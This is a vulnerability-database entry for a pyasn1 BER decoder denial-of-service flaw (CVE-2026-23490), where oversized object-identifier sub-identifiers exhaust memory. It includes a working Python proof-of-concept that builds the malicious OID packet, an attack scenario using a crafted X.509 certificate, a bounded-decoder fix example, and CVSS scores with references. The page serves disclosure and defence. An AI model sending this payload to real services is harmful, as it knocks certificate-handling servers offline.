Vulnerability details: VCID-bptp-5gn6-eucd
Vulnerability ID VCID-bptp-5gn6-eucd
Aliases CVE-2026-23490
GHSA-63vm-454h-vhhq
Summary pyasn1 has a DoS vulnerability in decoder

### Summary

After reviewing pyasn1 v0.6.1, a Denial-of-Service issue was found that leads to memory exhaustion when decoding a malformed RELATIVE-OID with an excessive number of continuation octets.

### Details

The decoder builds each sub-identifier by shifting an accumulator left by 7 bits for every continuation octet (an octet with its high bit set) and never bounds that accumulator, so an attacker-controlled run of continuation octets yields an arbitrarily large Python integer. The relevant line in the RELATIVE-OID decoder is `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496

The OBJECT IDENTIFIER decoder accumulates sub-identifiers the same way, which is what the PoC below exercises (tag 0x06).

### PoC

For the DoS:

```py
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource

# Deliberately set memory limit to display PoC
try:
    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
    print("[*] Memory limit set to 100MB")
except:
    print("[-] Could not set memory limit")

# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])
print(f"[*] Testing with {payload_size_mb}MB payload...")
payload_size = payload_size_mb * 1024 * 1024

# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)

# DER length encoding (supports up to 4GB)
if length < 128:
    length_bytes = bytes([length])
elif length < 256:
    length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
    length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
    length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
    # 4 bytes can handle up to 4GB
    length_bytes = b'\x84' + length.to_bytes(4, 'big')

# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload
print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")

try:
    print("[*] Decoding (this may take time or exhaust memory)...")
    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())
    print(f'[+] Decoded successfully')
    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')

    # Try to convert to string
    print('[*] Converting to string...')
    try:
        str_result = str(result[0])
        print(f'[+] String succeeded: {len(str_result)} chars')
        if len(str_result) > 10000:
            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
    except MemoryError:
        print(f'[-] MemoryError during string conversion!')
    except Exception as e:
        print(f'[-] {type(e).__name__} during string conversion')
except MemoryError:
    print('[-] MemoryError: Out of memory!')
except Exception as e:
    print(f'[-] Error: {type(e).__name__}: {e}')

print("\n[*] Test completed")
```

Screenshots with the results:

#### DoS

[Two screenshots of the PoC run, Screenshot_20251219_160840 (https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f) and Screenshot_20251219_152815 (https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa); not reproduced here.]

#### Leak analysis

A potential heap leak was investigated but came back clean:

```
[*] Creating 1000KB payload...
[*] Decoding with pyasn1...
[*] Materializing to string...
[+] Decoded 2157784 characters
[+] Binary representation: 896001 bytes
[+] Dumped to heap_dump.bin
[*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081
[*] First 64 bytes (ASCII/hex dump):
0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02  ..... @..... @..
0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08  ... @..... @....
0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20  . @..... @.....
0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81  @..... @..... @.
[*] Digit distribution analysis:
'0': 10.1%  '1': 9.9%  '2': 10.0%  '3': 9.9%  '4': 9.9%
'5': 10.0%  '6': 10.0%  '7': 10.0%  '8': 9.9%  '9': 10.1%
```

### Scenario

1. An attacker creates a malicious X.509 certificate.
2. The application validates certificates.
3. The application accepts the malicious certificate and tries to decode it, triggering the issue described above.

### Impact

The oversized integer is built during decoding and grows further when the value is rendered as a string, so any service that decodes attacker-supplied BER/DER can be driven to consume memory and CPU until it hangs or stops. This may affect:

- LDAP servers
- TLS/SSL endpoints
- OCSP responders
- etc.

### Recommendation

Add a limit on the number of octets a single sub-identifier may occupy in the decoder. Upstream's fix commits and the v0.6.2 release tag are listed in the references below.
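To make the decoder behaviour concrete, here is an added example (not pyasn1's own code, and not from the advisory author): a minimal BER OBJECT IDENTIFIER / RELATIVE-OID sub-identifier decoder written in the unbounded form the Details section describes, beside a bounded variant that rejects any sub-identifier spanning more than a caller-chosen number of octets, and a small TLV pre-check built on the bounded form that an application could run on untrusted DER before handing it to a full decoder. All function names, the `MAX_SUBID_OCTETS` cap and the `build_poc_oid` helper (which reproduces the advisory's 0x81-run payload shape) are the example's own assumptions; the sha256WithRSAEncryption OID is used as a real, well-formed input.

```python
# Added example for this page, not pyasn1's own code: unbounded base-128
# accumulation (the vulnerable shape) beside a bounded decoder that caps the
# octets per sub-identifier, plus a TLV pre-check built on the bounded form.
# Every name below is the example's own; the cap value is an assumption.
from __future__ import annotations

MAX_SUBID_OCTETS = 10  # assumption: 10 base-128 octets hold any 64-bit arc


class OidTooLong(ValueError):
    """Raised by the bounded decoder when one arc spans too many octets."""


def decode_subids_unbounded(content: bytes) -> list[int]:
    """Vulnerable shape: each continuation octet (high bit set) shifts the
    accumulator left by 7 bits, so n octets of 0x81 give a ~7n-bit integer."""
    arcs, acc, in_arc = [], 0, False
    for octet in content:
        acc = (acc << 7) | (octet & 0x7F)
        in_arc = True
        if not octet & 0x80:
            arcs.append(acc)
            acc, in_arc = 0, False
    if in_arc:
        raise ValueError("truncated sub-identifier")
    return arcs


def decode_subids_bounded(content: bytes, max_octets: int = MAX_SUBID_OCTETS) -> list[int]:
    """Same algorithm with a per-arc octet cap. It raises at octet cap+1 of an
    oversized arc, so the cost is bounded by the cap, not by the input size."""
    arcs, acc, n_octets = [], 0, 0
    for octet in content:
        n_octets += 1
        if n_octets > max_octets:
            raise OidTooLong(f"sub-identifier uses more than {max_octets} octets")
        if n_octets == 1 and octet == 0x80:
            raise ValueError("non-minimal sub-identifier encoding (leading 0x80)")
        acc = (acc << 7) | (octet & 0x7F)
        if not octet & 0x80:
            arcs.append(acc)
            acc, n_octets = 0, 0
    if n_octets:
        raise ValueError("truncated sub-identifier")
    return arcs


def parse_ber_tlv(data: bytes) -> tuple[int, bytes]:
    """Split one definite-length BER TLV into (tag, content). Long-form lengths
    of up to 4 octets are accepted, matching the encoder in the advisory's PoC."""
    if len(data) < 2:
        raise ValueError("short TLV")
    tag, first = data[0], data[1]
    if first < 0x80:
        length, offset = first, 2
    else:
        n = first & 0x7F
        if n == 0 or n > 4 or len(data) < 2 + n:
            raise ValueError("unsupported or truncated length")
        length, offset = int.from_bytes(data[2:2 + n], "big"), 2 + n
    content = data[offset:offset + length]
    if len(content) != length:
        raise ValueError("content shorter than declared length")
    return tag, content


def oid_from_arcs(arcs: list[int]) -> tuple[int, ...]:
    """X.690 packs the first two OID arcs into the first encoded sub-identifier."""
    if not arcs:
        raise ValueError("empty OID")
    first = arcs[0]
    head = (0, first) if first < 40 else (1, first - 40) if first < 80 else (2, first - 80)
    return head + tuple(arcs[1:])


def screen_oid_tlv(tlv: bytes, max_octets: int = MAX_SUBID_OCTETS):
    """Pre-check for untrusted DER before it reaches a full decoder. Returns
    (True, oid_tuple) on success or (False, reason) on rejection."""
    try:
        tag, content = parse_ber_tlv(tlv)
        if tag not in (0x06, 0x0D):  # OBJECT IDENTIFIER, RELATIVE-OID
            return False, f"unexpected tag 0x{tag:02x}"
        arcs = decode_subids_bounded(content, max_octets)
        return True, (oid_from_arcs(arcs) if tag == 0x06 else tuple(arcs))
    except ValueError as exc:  # OidTooLong is a ValueError as well
        return False, str(exc)


def build_poc_oid(n_continuation: int) -> bytes:
    """Constructed input in the advisory's pattern: tag 0x06, a definite length,
    then n continuation octets (0x81) and a terminating 0x00, i.e. one arc."""
    content = b"\x81" * n_continuation + b"\x00"
    length = len(content)
    if length < 0x80:
        length_bytes = bytes([length])
    else:
        lb = length.to_bytes((length.bit_length() + 7) // 8, "big")
        length_bytes = bytes([0x80 | len(lb)]) + lb
    return b"\x06" + length_bytes + content


if __name__ == "__main__":
    # sha256WithRSAEncryption (1.2.840.113549.1.1.11) as real DER, then the PoC shape
    print(screen_oid_tlv(bytes.fromhex("06092a864886f70d01010b")))
    big = build_poc_oid(1000)
    print(decode_subids_unbounded(parse_ber_tlv(big)[1])[0].bit_length(), "bits unbounded")
    print(screen_oid_tlv(big))
```

With 1000 continuation octets the unbounded decoder returns a single 7001-bit arc, and the cost keeps scaling with the payload; the bounded decoder stops at the eleventh octet regardless of how much input follows, which is the property a fix needs. The cap of 10 octets is an assumption chosen to admit any 64-bit arc; real-world OIDs use far fewer, so a deployment can tighten it further.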
Status Published
Exploitability 0.5
Weighted Severity 8.0
Risk 4.0
Affected and Fixed Packages Package Details
Weaknesses (4)
System Score Found at
cvssv3 7.5 https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
epss 0.00021 https://api.first.org/data/v1/epss?cve=CVE-2026-23490
cvssv3.1 7.5 https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
cvssv3.1_qr HIGH https://github.com/advisories/GHSA-63vm-454h-vhhq
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1
generic_textual HIGH https://github.com/pyasn1/pyasn1
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
generic_textual HIGH https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
generic_textual HIGH https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
ssvc Track https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
generic_textual HIGH https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
generic_textual HIGH https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
ssvc Track https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
cvssv3.1 7.5 https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
cvssv3.1_qr HIGH https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
generic_textual HIGH https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
ssvc Track https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
cvssv3.1 7.5 https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
generic_textual HIGH https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
cvssv3.1 7.5 https://nvd.nist.gov/vuln/detail/CVE-2026-23490
generic_textual HIGH https://nvd.nist.gov/vuln/detail/CVE-2026-23490
Reference id Reference type URL
https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
https://api.first.org/data/v1/epss?cve=CVE-2026-23490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490
https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
https://github.com/pyasn1/pyasn1
https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
https://nvd.nist.gov/vuln/detail/CVE-2026-23490
1125753 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753
2430472 https://bugzilla.redhat.com/show_bug.cgi?id=2430472
GHSA-63vm-454h-vhhq https://github.com/advisories/GHSA-63vm-454h-vhhq
RHSA-2026:1903 https://access.redhat.com/errata/RHSA-2026:1903
RHSA-2026:1904 https://access.redhat.com/errata/RHSA-2026:1904
RHSA-2026:1905 https://access.redhat.com/errata/RHSA-2026:1905
RHSA-2026:1906 https://access.redhat.com/errata/RHSA-2026:1906
RHSA-2026:2221 https://access.redhat.com/errata/RHSA-2026:2221
RHSA-2026:2299 https://access.redhat.com/errata/RHSA-2026:2299
RHSA-2026:2300 https://access.redhat.com/errata/RHSA-2026:2300
RHSA-2026:2302 https://access.redhat.com/errata/RHSA-2026:2302
RHSA-2026:2303 https://access.redhat.com/errata/RHSA-2026:2303
RHSA-2026:2309 https://access.redhat.com/errata/RHSA-2026:2309
RHSA-2026:2453 https://access.redhat.com/errata/RHSA-2026:2453
RHSA-2026:2460 https://access.redhat.com/errata/RHSA-2026:2460
RHSA-2026:2483 https://access.redhat.com/errata/RHSA-2026:2483
RHSA-2026:2486 https://access.redhat.com/errata/RHSA-2026:2486
RHSA-2026:2712 https://access.redhat.com/errata/RHSA-2026:2712
RHSA-2026:2758 https://access.redhat.com/errata/RHSA-2026:2758
RHSA-2026:3354 https://access.redhat.com/errata/RHSA-2026:3354
RHSA-2026:3359 https://access.redhat.com/errata/RHSA-2026:3359
RHSA-2026:3958 https://access.redhat.com/errata/RHSA-2026:3958
RHSA-2026:3959 https://access.redhat.com/errata/RHSA-2026:3959
RHSA-2026:4138 https://access.redhat.com/errata/RHSA-2026:4138
RHSA-2026:4139 https://access.redhat.com/errata/RHSA-2026:4139
RHSA-2026:4140 https://access.redhat.com/errata/RHSA-2026:4140
RHSA-2026:4141 https://access.redhat.com/errata/RHSA-2026:4141
RHSA-2026:4142 https://access.redhat.com/errata/RHSA-2026:4142
RHSA-2026:4143 https://access.redhat.com/errata/RHSA-2026:4143
RHSA-2026:4144 https://access.redhat.com/errata/RHSA-2026:4144
RHSA-2026:4145 https://access.redhat.com/errata/RHSA-2026:4145
RHSA-2026:4146 https://access.redhat.com/errata/RHSA-2026:4146
RHSA-2026:4147 https://access.redhat.com/errata/RHSA-2026:4147
RHSA-2026:4148 https://access.redhat.com/errata/RHSA-2026:4148
RHSA-2026:4943 https://access.redhat.com/errata/RHSA-2026:4943
RHSA-2026:5606 https://access.redhat.com/errata/RHSA-2026:5606
USN-7975-1 https://usn.ubuntu.com/7975-1/
USN-8134-1 https://usn.ubuntu.com/8134-1/
No exploits are available.
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
Attack Vector (AV): network; Attack Complexity (AC): low; Privileges Required (PR): none; User Interaction (UI): none; Scope (S): unchanged; Confidentiality Impact (C): none; Integrity Impact (I): none; Availability Impact (A): high
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/ Found at https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/ Found at https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
Vector: SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/ Found at https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2026-23490
Exploit Prediction Scoring System (EPSS)
Percentile 0.05618
EPSS Score 0.00021
Published At April 2, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-04-01T12:52:15.688778+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-63vm-454h-vhhq/GHSA-63vm-454h-vhhq.json 38.0.0